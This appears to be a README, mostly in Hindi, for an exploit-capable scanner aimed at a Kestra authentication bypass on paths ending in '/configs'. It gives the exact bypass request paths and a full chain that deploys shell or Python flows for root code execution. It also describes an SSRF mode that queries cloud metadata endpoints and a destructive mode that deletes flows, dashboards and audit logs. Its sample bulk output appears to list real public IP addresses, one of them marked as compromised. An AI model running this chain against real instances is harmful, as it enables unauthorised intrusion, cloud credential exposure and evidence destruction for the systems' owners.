
Kestra Auth-Bypass भेद्यता जाँचक
Kestra इंस्टेंस को endsWith("/configs") प्रमाणीकरण फ़िल्टर बाईपास के लिए स्कैन करता है। Kestra का AuthenticationFilter.java सटीक पथ /api/v1/configs के मिलान के बजाय request.getPath().endsWith("/configs") की जाँच करता है। चूंकि Kestra संसाधनों को कॉलर-चयनित पथ खंडों (नेमस्पेस, फ्लो आईडी) के माध्यम से संबोधित करता है, /configs में समाप्त होने वाला कोई भी पथ बेसिक-प्रमाणीकरण को बायपास करता है जिससे अप्रमाणित फ्लो निर्माण और आरसीई संभव हो पाता है। (CVSS 10.0)
संदर्भ:
GET /api/v1/configs (200 लौटना चाहिए; Kestra संस्करण के लिए प्रतिक्रिया निकाय पार्स किया जाता है)GET /api/v1/{tenant}/flows (यदि प्रमाणीकरण लागू है तो 401/403 लौटना चाहिए)/configs में समाप्त होने वाले पथों पर 6 GET अनुरोध; यदि कोई भी 401/403 नहीं लौटाता है जबकि प्रमाणीकरण जाँच लागू होती है, तो इंस्टेंस असुरक्षित है--aggressive) लिखने-बाईपास क्षमता की पुष्टि करने के लिए PUT अनुरोध भी भेजता है--rce) पूर्ण श्रृंखला: शेल/पायथन फ्लो बनाएँ → निष्पादन ट्रिगर करें → लॉग प्राप्त करें → कोड निष्पादन की पुष्टि करें → सफाई करें--ssrf) Pebble के http() का उपयोग करके AWS/GCP/Azure क्लाउड मेटाडेटा और आंतरिक एंडपॉइंट को लक्षित करने वाला एक फ्लो बनाता है, फिर सबूत के लिए लॉग की जाँच करता है--destructive) फ्लो, डैशबोर्ड और लॉग बाईपास पथों पर DELETE भेजता है ताकि विनाशकारी संचालन बाईपास की पुष्टि हो सके| प्रोब | विधि | पथ | विवरण |
|---|---|---|---|
| सार्वजनिक कॉन्फ़िग | GET | /api/v1/configs | जीवितता जाँच + संस्करण निष्कर्षण |
| संरक्षित सामान्य | GET | /api/v1/{tenant}/flows | प्रमाणीकरण प्रवर्तन आधार रेखा |
| फ्लो बाईपास | GET | /api/v1/{tenant}/flows/{namespace}/configs | फ्लो सूची बाईपास |
| निष्पादन बाईपास | GET | /api/v1/{tenant}/executions/{namespace}/configs | निष्पादन बाईपास |
| KV स्टोर बाईपास | GET | /api/v1/{tenant}/namespaces/{namespace}/kv/configs | KV पढ़ने का बाईपास |
| डैशबोर्ड बाईपास | GET | /api/v1/{tenant}/dashboards/configs | डैशबोर्ड बाईपास |
| लॉग बाईपास | GET | /api/v1/{tenant}/logs/{namespace}/configs | लॉग एक्सेस बाईपास |
| टेम्पलेट बाईपास | GET | /api/v1/{tenant}/templates/{namespace}/configs | टेम्पलेट पढ़ने का बाईपास |
--aggressive)| प्रोब | विधि | पथ | विवरण |
|---|---|---|---|
| फ्लो PUT बाईपास | PUT | फ्लो बाईपास के समान | एक न्यूनतम debug.Return फ्लो बनाता है |
| KV PUT बाईपास | PUT | KV बाईपास के समान | एक KV प्रविष्टि {"scanned": true} बनाता है |
--destructive)| प्रोब | विधि | पथ | विवरण |
|---|---|---|---|
| फ्लो DELETE बाईपास | DELETE | फ्लो बाईपास के समान | "configs" नामक संसाधन को हटाता है |
| डैशबोर्ड DELETE बाईपास | DELETE | डैशबोर्ड बाईपास के समान | "configs" नामक डैशबोर्ड को हटाता है |
| लॉग DELETE बाईपास | DELETE | लॉग बाईपास के समान | ऑडिट लॉग नष्ट करता है |
--rce)तभी चलता है जब प्रमाणीकरण बाईपास की पुष्टि हो। परामर्श से पूर्ण श्रृंखला:
| चरण | विधि | पथ | विवरण |
|---|---|---|---|
| 1. RCE फ्लो बनाएँ | PUT | /api/v1/{tenant}/flows/{namespace}/configs | io.kestra.plugin.scripts.shell.Commands (echo <marker>, id, hostname) के साथ फ्लो तैनात करता है। विफलता पर io.kestra.plugin.scripts.python.Script पर वापस आ जाता है। |
| 2. निष्पादन ट्रिगर | POST | /api/v1/{tenant}/executions/{namespace}/configs | बाईपास पथ के माध्यम से फ्लो शुरू करता है |
| 3. लॉग पोल करें | GET | /api/v1/{tenant}/logs/search?executionId=<id> | अद्वितीय RCE मार्कर की तलाश में --poll-retries बार (डिफ़ॉल्ट 10) हर --poll-interval सेकंड (डिफ़ॉल्ट 3) पर पोल करता है |
| 4. सफाई | DELETE | चरण 1 के समान | तैनात फ्लो को हटाता है |
--ssrf)तभी चलता है जब प्रमाणीकरण बाईपास की पुष्टि हो:
| चरण | विधि | पथ | विवरण |
|---|---|---|---|
| 1. SSRF फ्लो बनाएँ | PUT | /api/v1/{tenant}/flows/{namespace}/configs | AWS (169.254.169.254/latest/meta-data/ami-id), GCP (metadata.google.internal), Azure (169.254.169.254/metadata/instance), और आंतरिक (127.0.0.1:8080/api/v1/configs) के लिए Pebble http() कॉल के साथ एक debug.Return कार्य तैनात करता है |
| 2. निष्पादन ट्रिगर | POST | RCE चरण 2 के समान | फ्लो ट्रिगर करता है |
| 3. लॉग पोल करें | GET | /api/v1/{tenant}/logs/search?executionId=<id> | क्लाउड मेटाडेटा संकेतकों (ami-, i-, 169.254.169.254, metadata.google.internal, आदि) की जाँच करता है |
| 4. सफाई | DELETE | चरण 1 के समान | तैनात फ्लो को हटाता है |
positional:
target Single target URL (e.g. http://localhost:8080)
options:
-f, --file File with targets (one per line)
-t, --timeout Request timeout in seconds (default: 10)
--verify-ssl Verify TLS certificates
-j, --json Output JSON to stdout
-o, --output Write JSON report to file
--tenant Tenant name (default: "main")
--namespace Namespace for bypass paths (default: "tutorial")
-w, --workers Thread count for bulk scans (default: 10)
-a, --aggressive Send PUT requests to confirm write bypass
-P, --auto-ports Ports for auto-expand (default: 8080 8081 8088 8091 80 443)
advanced probes:
-r, --rce Enable RCE verification chain (shell + python flow,
execution trigger, log retrieval, auto-cleanup)
-s, --ssrf Enable SSRF detection (Pebble http() to cloud metadata
endpoints, log-based evidence collection)
-d, --destructive Enable DELETE probes on flows, dashboards, and logs
(WILL delete resources on vulnerable instances)
--poll-interval Seconds between log polls for RCE/SSRF chains (default: 3)
--poll-retries Max log poll attempts for RCE/SSRF chains (default: 10)
प्रति-प्रोब विवरण संवर्धन (संस्करण, RCE, SSRF, DELETE स्थिति) और निर्णय के साथ:
====================================================================
Target: http://10.0.0.1:8080
Timestamp: 2026-06-30T12:00:00+00:00
====================================================================
Version: 1.3.20 (AFFECTED)
RCE: CONFIRMED via shell
| SCAN_RCE_a1b2c3d4e5f6
| uid=0(root) gid=0(root) groups=0(root)
SSRF: DETECTED
| Indicators found: ami-, 169.254.169.254, 127.0.0.1:8080
DELETE BYPASS: CONFIRMED destructive ops bypass auth
[Flows Bypass]
URL: http://10.0.0.1:8080/api/v1/main/flows/tutorial/configs
Status: 200
Bypass: YES
[Exec Bypass]
URL: http://10.0.0.1:8080/api/v1/main/executions/tutorial/configs
Status: 404
Bypass: No
...
── RCE Verification Chain ──
Flow Create: 201
Exec Trigger: 201
Log Evidence: 200
> SCAN_RCE_a1b2c3d4e5f6
> uid=0(root) gid=0(root) groups=0(root)
Flow Cleanup: 204
── SSRF Detection Chain ──
Flow Create: 201
Exec Trigger: 201
Evidence: 200
Indicators found: ami-, 169.254.169.254, 127.0.0.1:8080
Flow Cleanup: 204
[VULN] Verdict: VULNERABLE ...
====================================================================
RCE/SSRF/DEL फ्लैग कॉलम के साथ क्रमबद्ध सारणीबद्ध तालिका:
========================================================================================================================================
BULK SCAN SUMMARY GHSA-5vc5-wxxq-3fjx | CVE-2026-49869 / CVE-2026-53576
========================================================================================================================================
# Target Auth Flows Exec KV Dash Logs Tmpl RCE SSRF DEL Ver
---------------------------------------------------------------------------------------------------------------------------------------
1 http://173.249.1.26:8080 401 404 ERR ERR ERR 405 404 YES YES YES RCE!
2 http://207.180.207.199:8080 401 404 ERR ERR ERR 405 404 INC - YES VULN
...
30 http://103.115.65.228:8080 401 401 ERR 401 ERR 401 401 - - - SAFE
...
========================================================================================================================================
Total: 258 | Vulnerable: 5 | RCE Confirmed: 1 | SSRF Detected: 1 | DEL Bypass: 2 | Safe: 29 | Inconclusive: 224
========================================================================================================================================
निकास कोड: 0 = कोई भेद्यता नहीं, 1 = भेद्यता मिली, 2 = सभी अनिर्णायक।
-j या -o का उपयोग करने पर, आउटपुट में प्रति लक्ष्य संवर्धन फ़ील्ड शामिल होते हैं:
{
"scan_info": {
"scanner": "kestra_cve v2.0.0",
"cve": ["CVE-2026-49869", "CVE-2026-53576"],
"aggressive": true,
"rce": true,
"ssrf": true,
"destructive": true
},
"results": [
{
"target": "http://10.0.0.1:8080",
"vulnerable": true,
"version": "1.3.20",
"version_in_affected_range": true,
"rce_confirmed": true,
"rce_method": "shell",
"rce_evidence": "SCAN_RCE_a1b2c3d4e5f6\nuid=0(root)",
"ssrf_detected": true,
"ssrf_evidence": "Indicators found: ami-, 169.254.169.254, 127.0.0.1:8080",
"delete_bypass": true,
"probes": { "..." : "..." }
}
],
"summary": {
"total": 258,
"vulnerable": 5,
"rce_confirmed": 1,
"ssrf_detected": 1,
"delete_bypass": 2,
"safe": 29,
"inconclusive": 224
}
}
स्कैनर स्वचालित रूप से GET /api/v1/configs प्रतिक्रिया से Kestra संस्करण निकालता है और इसे वर्गीकृत करता है:
| संस्करण | वर्गीकरण |
|---|---|
<= 1.0.44 | प्रभावित (1.0 शाखा, पैच से पहले) |
>= 1.0.45 | पैच किया गया (1.0 शाखा) |
1.3.0 1.3.20 | प्रभावित (1.3 शाखा, पैच से पहले) |
>= 1.3.21 | पैच किया गया (1.3 शाखा) |
>= 1.4.0 | पैच किया गया (प्रभावित सीमा से नया) |
| अज्ञात | प्रतिक्रिया में संस्करण नहीं मिला |
यह शाखा-जागरूक तुलना का उपयोग करता है क्योंकि Kestra अलग-अलग पैच शाखाओं (1.0.x और 1.3.x) का रखरखाव करता है।
Python 3.10+ की आवश्यकता है।
pip install -r requirements.txt
python main.py --help
केवल अधिकृत रक्षात्मक परीक्षण के लिए। --rce और --destructive फ्लैग लक्ष्य पर वास्तविक संसाधन बनाते और निष्पादित करते हैं। उन सिस्टमों को स्कैन करने से पहले हमेशा उचित लिखित प्राधिकरण प्राप्त करें जिनके आप स्वामी नहीं हैं।